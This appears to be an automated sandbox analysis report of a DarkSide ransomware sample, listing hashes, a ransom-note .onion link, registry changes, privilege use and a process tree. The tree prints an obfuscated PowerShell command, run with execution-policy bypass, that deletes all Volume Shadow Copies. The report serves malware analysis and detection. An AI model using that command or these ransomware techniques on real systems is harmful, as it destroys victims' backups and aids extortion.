Analysis
-
max time kernel
119s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
31-05-2024 12:32
Static task
static1
Behavioral task
behavioral1
Sample
762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe
Resource
win10v2004-20240508-en
General
-
Target
762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe
-
Size
260KB
-
MD5
5a1dfcf340060e11fd97775f08cc707d
-
SHA1
ca7ba09b986c4c7c8590a2b90215785bef2efb41
-
SHA256
762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3
-
SHA512
9aae78da9f1c81ff671f721322031a2f12fefc3afaa90d5434a300f23775b568ed0129b629ec1910bb8345af64ff0b72f256c8f26377a5e6e527ddf5c81658b3
-
SSDEEP
6144:+GuWNCix6AcxVBkerhbzfpZUU6wpKBWrl8mQEy:uOCix6JPzVhSwN58mty
Malware Config
Extracted
C:\Users\Admin\README.398da5ec.TXT
darkside
http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Renames multiple (151) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\398da5ec.BMP" 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\398da5ec.BMP" 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe -
Modifies Control Panel 1 IoCs
Processes:
762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\WallpaperStyle = "10" 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe -
Modifies registry class 5 IoCs
Processes:
762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\398da5ec\DefaultIcon 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\398da5ec 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\398da5ec\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\398da5ec.ico" 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.398da5ec 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.398da5ec\ = "398da5ec" 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exe762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exepid process 3060 powershell.exe 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeSecurityPrivilege 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeTakeOwnershipPrivilege 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeLoadDriverPrivilege 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeSystemProfilePrivilege 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeSystemtimePrivilege 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeProfSingleProcessPrivilege 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeIncBasePriorityPrivilege 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeCreatePagefilePrivilege 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeBackupPrivilege 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeRestorePrivilege 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeShutdownPrivilege 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeDebugPrivilege 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeSystemEnvironmentPrivilege 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeRemoteShutdownPrivilege 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeUndockPrivilege 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeManageVolumePrivilege 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: 33 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: 34 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: 35 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeDebugPrivilege 3060 powershell.exe Token: SeBackupPrivilege 856 vssvc.exe Token: SeRestorePrivilege 856 vssvc.exe Token: SeAuditPrivilege 856 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exedescription pid process target process PID 1660 wrote to memory of 3060 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe powershell.exe PID 1660 wrote to memory of 3060 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe powershell.exe PID 1660 wrote to memory of 3060 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe powershell.exe PID 1660 wrote to memory of 3060 1660 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe powershell.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe"C:\Users\Admin\AppData\Local\Temp\762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe"1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3060
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:856
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5cdd149fb5a465473009bf592f4794dea
SHA109dd441f6ce9e8770241e9ef5a21fbe85d450c02
SHA256a7a637ac2e981a73024e9c83eefe1671e5694ae367e6ec94e461439aa023b15c
SHA5127835a9c54197c8693cf8515bd7ded7696a3b03b5aa0f4fc5522d7c6a3f9e12004bd1fe3fd184ded0f8feafb600328b70284f5b20c7dabb9c4a2400bf06cc0e66
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD5ea177aaec5b01d6aa658e8f10320fc37
SHA1554da12fdf9a632aaee9f97a1ba875dbec09aa6a
SHA256ac710199867b556932c8c75bd29d75d36ede3756c5986748dcb8442f1d561066
SHA5125a9c11368ba1a1209fdc5d84673158af83fe53a2b848614e08b3e20de629b0b2e9255a98f295db856e960af695887e3ce4000e8866a4621a80fe33e1ae66d72d
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD54f28c13ff86e2bcd071df2d0bb1cdd51
SHA1cefbfe9b23cc172fedecf10a0565b7897fe727f6
SHA256cefd6ff5716839b73e05182c0de58490f9a3f54bc0c3720dbbbac24e1d18eaa7
SHA512b3d4a0d4cba9f539ff7e03e306602d920a798c177d23c07c17fdbdffa4c116f83f3a08ac6b15281a6c83886e90589c6c29014cc45a5ade73961ffed79ba4c5fe
-
Filesize
1KB
MD5f418a249405444da33cc73b402a26306
SHA11a6c493e74036f93f0dae4b65e6c543c213ce418
SHA256b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09
SHA512b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf